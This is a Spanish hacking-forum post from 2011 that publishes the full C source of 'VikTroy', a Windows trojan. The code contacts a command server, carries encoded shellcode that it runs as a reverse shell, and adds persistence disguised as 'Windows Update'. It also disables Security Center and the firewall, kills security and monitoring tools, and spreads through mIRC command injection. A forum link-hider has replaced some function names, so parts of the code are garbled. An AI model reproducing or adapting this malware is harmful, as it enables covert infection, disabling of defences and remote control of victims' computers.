comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Troyano [C]

  • 0 Respuestas
  • 1975 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5380
  • Actividad:
    76.67%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Mayo 22, 2011, 10:01:56 pm »
Código: C
  1. /*
  2.    Autor: Coded by Rozor\xZR !Sub_Level
  3.    IRC: irc.irc-hispano.org #sub_level
  4.    URL: http://sincontrol.tomahost.org
  5.    Lenguaje: C/C++ Win32
  6.    Name: VikTroy
  7.    Ejecutable: VikTroy.exe
  8.  
  9. */
  10.  
  11. // Mazard Roolz
  12. // www.mazard.info
  13. // http://sincontrol.tomahost.org/dor/virus/vk-troy.c
  14.  
  15. #include <windows.h>
  16. #include <stdio.h>
  17. #include <string.h>
  18. #include <winsock.h>
  19. #include <stdlib.h>
  20. #include <process.h>
  21. #include <winbase.h>
  22. //#include <sys\types.h>
  23. #include <tlhelp32.h>
  24.  
  25. #define CM_PRUEBA 101
  26. #define CM_SALIR 102
  27.  
  28. #pragma comment(lib, "wsock32.lib")
  29.  
  30.  
  31. // SOCKET PRINCIPAL
  32. SOCKET sck;
  33. char RegQueryInfo[] = "reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe";
  34. char SeCent[] = "net stop \"Security Center\"";
  35. char Shared[] = "net stop \"SharedAccess\"";
  36. char Reg1[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\" /v Start /t REG_DWORD /d 0x4 /f";
  37. char Reg3[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\wscsvc\" /v Start /t REG_DWORD /d 0x4 /f";
  38. char CreateSrv[] = "sc create wscenter binPath= \"%systemroot%\\system32\\viktroy.exe\" type= kernel start= boot error= ignore DisplayName= \"Windows Security Center\"";
  39.  
  40. LRESULT CALLBACK WindowProc(HWND, UINT, WPARAM, LPARAM);
  41.  
  42. // PAYLOAD
  43. unsigned char payload[] =
  44.  
  45. "\x33\xc9\x83\xe9\xb8\xe8"
  46. "\xff\xff\xff\xff"
  47. "\xc0\x5e\x81\x76\x0e\x4a"
  48. "\x27\x98\xb9\x83\xee\xfc\xe2\xf4\xb6\x4d"
  49. "\x73\xf4\xa2\xde\x67\x46"
  50. "\xb5\x47\x13\xd5\x6e\x03\x13\xfc\x76\xac\xe4\xbc\x32\x26\x77\x32"
  51. "\x05\x3f\x13\xe6\x6a\x26\x73\xf0\xc1\x13\x13\xb8\xa4\x16\x58\x20"
  52. "\xe6\xa3\x58\xcd\x4d\xe6\x52\xb4\x4b\xe5\x73\x4d\x71\x73\xbc\x91"
  53. "\x3f\xc2\x13\xe6\x6e\x26\x73\xdf\xc1\x2b\xd3\x32\x15\x3b\x99\x52"
  54. "\x49\x0b\x13\x30\x26\x03\x84\xd8\x89\x16\x43\xdd\xc1\x64\xa8\x32"
  55. "\x0a\x2b\x13\xc9\x56\x8a\x13\xf9\x42\x79\xf0\x37\x04\x29\x74\xe9"
  56. "\xb5\xf1\xfe\xea\x2c\x4f\xab\x8b\x22\x50\xeb"
  57. "\x8b\x15\x73\x67\x69" // w0w
  58. "\x22\xec\x75\x45\x71\x77\x67"
  59. "\x6f\x15\xae\x7d\xdf\xcb\xca\x90\xbb"
  60. "\x1f\x4d\x9a\x46\x9a\x4f\x41\xb0\xbf\x8a\xcf\x46\x9c\x74\xcb\xea"
  61. "\x19\x64\xcb\xfa\x19\xd8\x48\xd1\x35\x27\x98\xb8\x2c\x4f\x9a\x23"
  62. "\x2c\x74\x11\x58\xdf\x4f\x74\x40\xe0\x47\xcf\x46\x9c\x4d\x88\xe8"
  63. "\x1f\xd8\x48\xdf\x20\x43\xfe\xd1\x29\x4a\xf2\xe9\x13\x0e\x54\x30"
  64. "\xad\x4d\xdc\x30\xa8\x16\x58\x4a\xe0\xb2\x11\x44\xb4\x65\xb5\x47"
  65. "\x08\x0b\x15\xc3\x72\x8c\x33" // r0x
  66. "\x12\x22\x55\x66\x0a\x5c\xd8\xed\x91"
  67. "\xb5\xf1\xc3\xee\x18\x76\xc9\xe8"
  68. "\x20\x26\xc9\xe8\x1f\x76\x67\x69"
  69. "\x22\x8a\x41\xbc\x84\x74\x67\x6f\x20\xd8\x67\x8e\xb5\xf7\xf0\x5e"
  70. "\x33\xe1\xe1\x46\x3f\x23\x67\x6f\xb5\x50\x64\x46\x9a\x4f\xe6\x61"
  71. "\xa8\x54\xcb\x46\x9c"  // c0d3d
  72. "\xd8\x48\xb9\x90\x90\x90";
  73.  
  74.  
  75.  
  76.  
  77.  
  78.  
  79. //ListaProcesos
  80. char *proc_list[]={
  81.                  "cmd.exe", "taskmgr.exe", "netstat.exe", "tasklist.exe", "taskkill.exe",
  82.                  "avp.exe", "ethereal.exe", "whireshark.exe", "snort.exe", "control.exe",
  83.              "autoruns.exe", "autorunsc.exe", "tcpview.exe", "ettercap.exe", "firefox.exe",
  84.                  "regedit.exe", "reg.exe" };
  85.                        
  86.  
  87.  
  88.  
  89.  
  90.  
  91.  
  92.  
  93.  
  94. // Thread Struct
  95.  
  96. typedef struct thread_struct
  97. {
  98.         char name[250];
  99.         HANDLE Thread_Handle;
  100.         int id;
  101. } thread;
  102.  
  103. thread threads[10];
  104.  
  105.  
  106.  
  107.  
  108.  
  109. int Comando(char recibido[130]);
  110. int CrearThread(char *name, HANDLE Thread_Handle, int id);
  111. void Esconder(void);
  112. void Reverse(void);
  113.  
  114.  
  115. DWORD WINAPI pcInfo(LPVOID param);
  116. DWORD WINAPI ownMirc(LPVOID param);
  117. DWORD WINAPI Pong(LPVOID param);
  118. DWORD WINAPI keyLogger(LPVOID param);
  119. DWORD WINAPI revShell(LPVOID param);
  120. DWORD WINAPI Infectar(LPVOID param);
  121. DWORD WINAPI winFuck(LPVOID param);
  122. DWORD WINAPI Happy(LPVOID param);
  123.  
  124.  
  125. int Comando(char recibido[130]);
  126. int CrearThread(char *name, HANDLE Thread_Handle, int id);
  127. void Esconder(void);
  128. void Reverse(void);
  129. /*int main(void);*/
  130. DWORD WINAPI pcInfo(LPVOID param);
  131. DWORD WINAPI ownMirc(LPVOID param);
  132. //DWORD WINAPI Pong(LPVOID param);
  133. DWORD WINAPI revShell(LPVOID param);
  134. DWORD WINAPI SendProcess(LPVOID param);
  135. DWORD WINAPI winFuck(LPVOID param);
  136. DWORD WINAPI Happy(LPVOID param);
  137. DWORD WINAPI CallChat(LPVOID param);
  138.  
  139. /*
  140. int main(int argc, char *argv[])
  141. {
  142.         char bof[25];
  143.         strcpy(bof, argv[1]);
  144.         return 0;
  145. }
  146. */
  147.  
  148.  
  149. // INDEX
  150.  
  151. int main(void)
  152. {
  153.     HANDLE hThread;
  154.         DWORD id;
  155.         WSADATA wsa;
  156.     struct sockaddr_in mysock;
  157.         char recvbuff[130];
  158.         char *hello = "HEllO";
  159.  
  160.         WSAStartup(MAKEWORD(1, 0), &wsa);
  161.         sck = socket(AF_INET, SOCK_STREAM, 0);
  162.         Esconder();
  163.         mysock.sin_family = AF_INET;
  164.         mysock.sin_addr.s_addr = inet_addr("127.0.0.1");
  165.         mysock.sin_port = htons(80);
  166.         No tienes permisos para ver links. Registrate o Entra con tu cuenta(&(mysock.sin_zero), '\0', 8);
  167.         //hThread = CreateThread(NULL, 0, Pong, NULL, 0, &id);
  168.         connect(sck, (struct sockaddr *)&mysock, sizeof(struct sockaddr));
  169.         send(sck, hello, No tienes permisos para ver links. Registrate o Entra con tu cuenta(hello), 0);
  170.         for(;;)
  171.         {
  172.                  if(recv(sck, recvbuff, 128, 0)>2)
  173.                  {
  174.                       Comando(recvbuff);
  175.                  }
  176.                  Sleep(800);
  177.         }
  178.  
  179.     Sleep(1000);
  180.         WSACleanup();
  181.         No tienes permisos para ver links. Registrate o Entra con tu cuenta("PAUSE");
  182.         return 1;
  183. }
  184.  
  185.  
  186.  
  187.  
  188.  
  189.  
  190. int Comando(char recibido[130])
  191. {
  192.  
  193.         HANDLE hThread;
  194.         DWORD id;
  195.  
  196.         char *pString;
  197.        
  198.         pString = No tienes permisos para ver links. Registrate o Entra con tu cuenta(recibido, '!');
  199.         if(pString==NULL)
  200.         {
  201.                 No tienes permisos para ver links. Registrate o Entra con tu cuenta("error");
  202.                 return -1;
  203.         }
  204.  
  205.         pString++;
  206.        
  207.         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta(pString, "info", 4)==0)
  208.         {
  209.                 hThread = CreateThread(NULL, 0, pcInfo, NULL, 0, &id);
  210.                 CrearThread("INFO", hThread, id);
  211.                 Sleep(1000);
  212.         }
  213.  
  214.         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta(pString, "mirc", 4)==0)
  215.         {
  216.                 hThread = CreateThread(NULL, 0, ownMirc, NULL, 0, &id);
  217.                 CrearThread("MIRC", hThread, id);
  218.         }
  219.  
  220.         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta(pString, "exit", 4)==0)
  221.         {
  222.                 closesocket(sck);
  223.                 WSACleanup();
  224.                 No tienes permisos para ver links. Registrate o Entra con tu cuenta("taskkill /F /IM viktroy.exe");
  225.         }
  226.  
  227.         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta(pString, "shell", 4)==0)
  228.         {
  229.                 hThread = CreateThread(NULL, 0, revShell, NULL, 0, &id);
  230.                 CrearThread("SHELL", hThread, id);
  231.         }
  232.  
  233.         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta(pString, "busca", 5)==0)
  234.         {
  235.                 hThread = CreateThread(NULL, 0, SendProcess, NULL, 0, &id);
  236.                 CrearThread("SHRC", hThread, id);
  237.         }
  238.  
  239.         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta(pString, "winfuck", 7)==0)
  240.         {
  241.                 hThread = CreateThread(NULL, 0, winFuck, NULL, 0, &id);
  242.                 CrearThread("FUCK", hThread, id);
  243.         }
  244.  
  245.         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta(pString, "showcmd", 7)==0)
  246.         {
  247.                 HWND hWnd;
  248.             hWnd = FindWindow("ConsoleWindowClass", NULL);
  249.             ShowWindow(hWnd, SW_SHOWNORMAL);
  250.         }
  251.  
  252.         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta(pString, "hidecmd", 7)==0)
  253.         {
  254.                 HWND hWnd;
  255.             hWnd = FindWindow("ConsoleWindowClass", NULL);
  256.             ShowWindow(hWnd, SW_HIDE);
  257.         }
  258.  
  259.         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta(pString, "happy", 5)==0)
  260.         {
  261.                 hThread = CreateThread(NULL, 0, Happy, NULL, 0, &id);
  262.                 CrearThread("HAPPY", hThread, id);
  263.         }
  264.  
  265.         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta(pString, "chat", 4)==0)
  266.         {
  267.                 hThread = CreateThread(NULL, 0, CallChat, NULL, 0, &id);
  268.                 CrearThread("CHAT", hThread, id);
  269.         }
  270.  
  271.         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta(pString, "infectar", 8)==0)
  272.         {
  273.       No tienes permisos para ver links. Registrate o Entra con tu cuenta("reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe");
  274.     }
  275.  
  276.  
  277.         return 0;        
  278.  
  279. }
  280.  
  281.  
  282.  
  283. void Reverse(void)
  284. {
  285.           void(*rever)();
  286.           *(int *)&rever = (int)payload;
  287.           rever();
  288.  
  289. }
  290.  
  291.  // Not ShellCode Call
  292. /*      PROCESS_INFORMATION pinfo;
  293.         STARTUPINFO sinfo;
  294.         SOCKET rsck;
  295.         //WSADATA wsadata;
  296.     struct sockaddr_in rSock;
  297.     memset(&sinfo,0,sizeof(sinfo));
  298.         //WSAStartup(MAKEWORD(1, 0), &wsadata);
  299.         rsck = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  300.         rSock.sin_addr.s_addr = inet_addr("127.0.0.1");
  301.         rSock.sin_family = AF_INET;
  302.     bind(rsck, (struct sockaddr*)&rSock, sizeof(rSock));
  303.         rSock.sin_port = htons(666);
  304.         memset(&(rSock.sin_zero), 0, 8);
  305.        
  306.         connect(rsck, (struct sockaddr *)&rSock, sizeof(rSock));
  307.         sinfo.cb = sizeof(sinfo);
  308.         sinfo.dwFlags = STARTF_USESTDHANDLES;
  309.         sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = rsck;
  310.         CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &sinfo, &pinfo);
  311.  
  312.   */
  313.  
  314.  
  315.  
  316. // ThreadGen
  317. int CrearThread(char *name, HANDLE Thread_Handle, int id)
  318. {
  319.         int c = No tienes permisos para ver links. Registrate o Entra con tu cuenta()%10;
  320.         No tienes permisos para ver links. Registrate o Entra con tu cuenta(threads[c].name,name);
  321.         threads[c].id = id;
  322.         threads[c].Thread_Handle = Thread_Handle;
  323.         return c;
  324. }
  325.  
  326.  
  327. // HIDE
  328. void Esconder(void)
  329. {
  330.         HWND hWnd;
  331.         hWnd = FindWindow("ConsoleWindowClass", NULL);
  332.         ShowWindow(hWnd, SW_HIDE);
  333. }
  334.  
  335.  
  336. // Arquitectura
  337. DWORD WINAPI pcInfo(LPVOID param)
  338. {
  339.         SYSTEM_INFO sysinfo;
  340.     char allinfo[16];
  341.         GetSystemInfo(&sysinfo);
  342.         if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_INTEL)
  343.         {
  344.                 No tienes permisos para ver links. Registrate o Entra con tu cuenta(allinfo, "Soy un INTEL ");
  345.                 if(sysinfo.wProcessorLevel==3)
  346.                 {
  347.                         No tienes permisos para ver links. Registrate o Entra con tu cuenta(allinfo, "!386 ");
  348.                 }
  349.  
  350.                 else if(sysinfo.wProcessorLevel==4)
  351.                 {
  352.                         No tienes permisos para ver links. Registrate o Entra con tu cuenta(allinfo, "!486 ");
  353.                 }
  354.                
  355.                 else if(sysinfo.wProcessorLevel==5)
  356.                 {
  357.                         No tienes permisos para ver links. Registrate o Entra con tu cuenta(allinfo, "Pentium ");
  358.                 }
  359.  
  360.                 else { No tienes permisos para ver links. Registrate o Entra con tu cuenta(allinfo, "unknow "); }
  361.  
  362.         }
  363.  
  364.         else if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_PPC)
  365.         {
  366.                 No tienes permisos para ver links. Registrate o Entra con tu cuenta(allinfo, "Soy un PocketPC ");
  367.                
  368.                 if(sysinfo.wProcessorLevel==1)
  369.                 {
  370.                         No tienes permisos para ver links. Registrate o Entra con tu cuenta(allinfo, "PPC 601 ");
  371.                 }
  372.                
  373.                 else if(sysinfo.wProcessorLevel==3)
  374.                 {
  375.                         No tienes permisos para ver links. Registrate o Entra con tu cuenta(allinfo, "PPC 601 ");
  376.                 }
  377.  
  378.                 else if(sysinfo.wProcessorLevel==20)
  379.                 {
  380.                         No tienes permisos para ver links. Registrate o Entra con tu cuenta(allinfo, "PPC 620 ");
  381.                 }
  382.  
  383.         }
  384.  
  385.         SetComputerName("xZ-Ownk");
  386.     send(sck, allinfo, No tienes permisos para ver links. Registrate o Entra con tu cuenta(allinfo), 0);
  387.         return 0;
  388.  
  389. }
  390.  
  391.  
  392. // Injeccion de comandos mirc. Gracias a CrowDat por su explicacion :P
  393.  
  394. DWORD WINAPI ownMirc(LPVOID param)
  395. {
  396.         HWND hWnd;
  397.         char run1[] = "/run VikTroy.exe";
  398.         SetForegroundWindow(hWnd);
  399.     hWnd = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC",
  400.            NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit", 0);
  401.  
  402.         SendMessage(hWnd, WM_SETTEXT, 0, (LPARAM)run1);
  403.         SendMessage(hWnd, WM_IME_KEYDOWN, VK_RETURN, 0);
  404.         Sleep(1500);
  405.         return 0;
  406. }
  407.  
  408.  
  409. // Pong Conexion Thread
  410.  
  411. /*DWORD WINAPI Pong(LPVOID param)
  412. {
  413.         char *pong="PONG";
  414.         for(;;)
  415.         {
  416.                 Sleep(25000);
  417.                 send(sck, pong, strlen(pong), 0);
  418.         }
  419.  
  420.         return 1;
  421. }
  422. */
  423.  
  424. // Reverse Shell Thread
  425.  
  426. DWORD WINAPI revShell(LPVOID param)
  427. {
  428.  
  429.    
  430.     Reverse();
  431.         return 0;
  432.  
  433. }
  434.  
  435.  
  436. // Tripode
  437.  
  438. DWORD WINAPI SendProcess(LPVOID param)
  439. {
  440.  
  441.         HANDLE hlista;
  442. PROCESSENTRY32 proceso;
  443. char proname[30];
  444. char killer[30];
  445. int ret, i, mok;
  446.    
  447.     mok = 0;
  448.     for(;;)
  449.         {
  450.           ret = 0;
  451.           i = 0;
  452.  
  453.     for(i=0;i<17;i++)
  454.         {
  455.     ZeroMemory(&proceso,sizeof(proceso));
  456.         proceso.dwSize = sizeof(proceso);
  457.         if ((hlista = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0)) != (HANDLE)-1) /* devuelve estructura con la captura de todos los procesos */
  458.         {
  459.                 ret = Process32First(hlista,&proceso);
  460.                 while(ret)
  461.                 {
  462.  
  463.                         No tienes permisos para ver links. Registrate o Entra con tu cuenta(proname,"%i %s",proceso.th32ProcessID,proceso.szExeFile);
  464.                         No tienes permisos para ver links. Registrate o Entra con tu cuenta("\n%s",proname);
  465.  
  466.                         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta(proceso.szExeFile, "mirc.exe")==0 && mok==0 )
  467.                         {
  468.                                 send(sck, "\nEncontrado Mirc.exe\n", No tienes permisos para ver links. Registrate o Entra con tu cuenta("\nEncontrado Mirc.exe\n"), 0);
  469.                             mok++;
  470.                         }
  471.  
  472.                         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta(proceso.szExeFile, proc_list[i])==0)
  473.                         {
  474.                                 No tienes permisos para ver links. Registrate o Entra con tu cuenta(killer, "taskkill /F /PID %d", proceso.th32ProcessID);
  475.                                 WinExec(killer, SW_HIDE);
  476.                         }
  477.                        
  478.  
  479.                         ret = Process32Next(hlista,&proceso);
  480.                 }
  481.          
  482.            CloseHandle(hlista);
  483.         }
  484.         }
  485.      Sleep(100);
  486.  
  487. }
  488.  
  489. }
  490.  
  491.  
  492.  
  493.         /*HKEY hKey;
  494.         unsigned char direccion[] = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run";
  495.     unsigned char proceso[] = "VikTroy.exe";
  496.        
  497.         RegCreateKey(HKEY_LOCAL_MACHINE, "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" , &hKey);
  498.         RegSetValueEx(hKey, "Microsoft Windows Firewall", 0, REG_SZ, proceso, sizeof("proceso"));
  499.     RegCloseKey(hKey);*/
  500.  
  501.  
  502.  
  503.  
  504. // WINDOWS FUCKEd x"DDDDDDDDDDD
  505.  
  506. DWORD WINAPI winFuck(LPVOID param)
  507. {
  508.  
  509.  
  510.  
  511.         __asm {
  512.                              mov eax, offset SeCent
  513.                                  push eax
  514.                                  call No tienes permisos para ver links. Registrate o Entra con tu cuenta
  515.                                  pop ebx
  516.                                  nop
  517.                                  nop
  518.                                  
  519.                  // Security Center Off
  520.  
  521.                                  mov eax, offset Shared
  522.                                  push eax
  523.                                  call No tienes permisos para ver links. Registrate o Entra con tu cuenta
  524.                                  pop ebx
  525.                                  nop
  526.                                  nop
  527.                  // Shared Off
  528.  
  529.                              mov eax, offset Reg1
  530.                                  push eax
  531.                                  call No tienes permisos para ver links. Registrate o Entra con tu cuenta
  532.                                  pop ebx
  533.                                  nop
  534.                                  nop
  535.                  // Reg1 In
  536.                        
  537.  
  538.                                  mov eax, offset Reg3
  539.                                  push eax
  540.                                  call No tienes permisos para ver links. Registrate o Entra con tu cuenta
  541.                                  pop ebx
  542.                                  nop
  543.                                  nop
  544.  
  545.                                  mov  eax, offset CreateSrv
  546.                                  push eax
  547.                  call No tienes permisos para ver links. Registrate o Entra con tu cuenta
  548.                                  pop ebx
  549.                                  nop
  550.                                  nop
  551.        
  552.                 }// Reg2 In
  553.  
  554.         return 0;
  555.        
  556.  
  557. }
  558.  
  559.  
  560.  
  561. // Funcion Feliz
  562.  
  563. DWORD WINAPI Happy(LPVOID param)
  564. {
  565.         int a = 0;
  566.     char *Texto = " VikTroy: Simple Trojan Horse   \n"
  567.                           " http://sincontrol.tomahost.org \n"
  568.                                   " Gm Vk Tj Pp                    \n"
  569.                                   " irc-hispano.org #sub_level     \n"
  570.                                   " by xZR !Sub_Level Security     \n";
  571.  
  572.         a = MessageBox(NULL,
  573.                       Texto,
  574.                           "by xZR !Sub_Level",
  575.                           MB_OK | MB_ICONERROR | MB_DEFBUTTON4);
  576.    for(;;)
  577.    {
  578.         if(a==IDOK || a==IDYES || a==IDABORT || a==IDCANCEL || a==IDNO)
  579.                 {
  580.            a= MessageBox(NULL,
  581.                                 Texto,
  582.                                    "by xZR !Sub_Level",
  583.                         MB_OK | MB_ICONERROR | MB_DEFBUTTON4);
  584.         }
  585.  
  586.   }
  587.  
  588.   return -1;
  589. }
  590.  
  591.  
  592.  
  593. // Not Avaible
  594.  
  595. DWORD WINAPI CallChat(LPVOID param)
  596. {
  597.         HINSTANCE hInstance, hPrevInstance;
  598.         LPSTR CmdLine;
  599.         int uCmd;
  600.         HWND hWnd;
  601.         MSG uMsg;
  602.         WNDCLASSEX wincl;
  603.         SOCKET chatsock;
  604.     struct sockaddr_in chsock;
  605.  
  606.         wincl.cbClsExtra = 0;
  607.         wincl.cbWndExtra = 0;
  608.         wincl.cbSize = sizeof(WNDCLASSEX);
  609.         wincl.hbrBackground = (HBRUSH) COLOR_HIGHLIGHT;
  610.         wincl.hCursor = LoadCursor(NULL, IDC_ARROW);
  611.         wincl.hIcon = LoadIcon(NULL, "icono.ico");
  612.         wincl.hIconSm = LoadIcon(NULL, "icono.ico");
  613.         wincl.hInstance = hInstance;
  614.         wincl.lpfnWndProc = WindowProc;
  615.         wincl.lpszClassName = "VentanaChat";
  616.         wincl.lpszMenuName = NULL;
  617.         wincl.style = CS_DBLCLKS;
  618.  
  619.         RegisterClassEx(&wincl);
  620.  
  621.         hWnd = CreateWindowEx(             0,
  622.                                    "VentanaChat",
  623.                                                   "Viktroy Talk",
  624.                                                    WS_OVERLAPPEDWINDOW,
  625.                                                    CW_USEDEFAULT,
  626.                                                    CW_USEDEFAULT,
  627.                                                    CW_USEDEFAULT,
  628.                                                    CW_USEDEFAULT,
  629.                                                     HWND_DESKTOP,
  630.                                                 NULL,
  631.                                                            hInstance,
  632.                                                                         NULL);
  633.  
  634.         ShowWindow(hWnd, SW_SHOWDEFAULT);
  635.  
  636.         while(TRUE == GetMessage(&uMsg, 0, 0, 0))
  637.         {
  638.                 TranslateMessage(&uMsg);       
  639.                         DispatchMessage(&uMsg);
  640.         }
  641.        
  642.         return uMsg.wParam;
  643.        
  644.  
  645. }
  646.  
  647.  
  648. LRESULT CALLBACK WindowProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
  649. {
  650.         switch(uMsg)
  651.         {
  652.         case WM_DESTROY:
  653.                 PostQuitMessage(0);
  654.                 break;
  655.         default:
  656.                 return DefWindowProc(hWnd, uMsg, wParam, lParam);
  657.         }
  658.  
  659.         return 0;
  660. }
« Última modificación: Febrero 08, 2014, 05:48:37 pm por Expermicid »


 

¿Te gustó el post? COMPARTILO!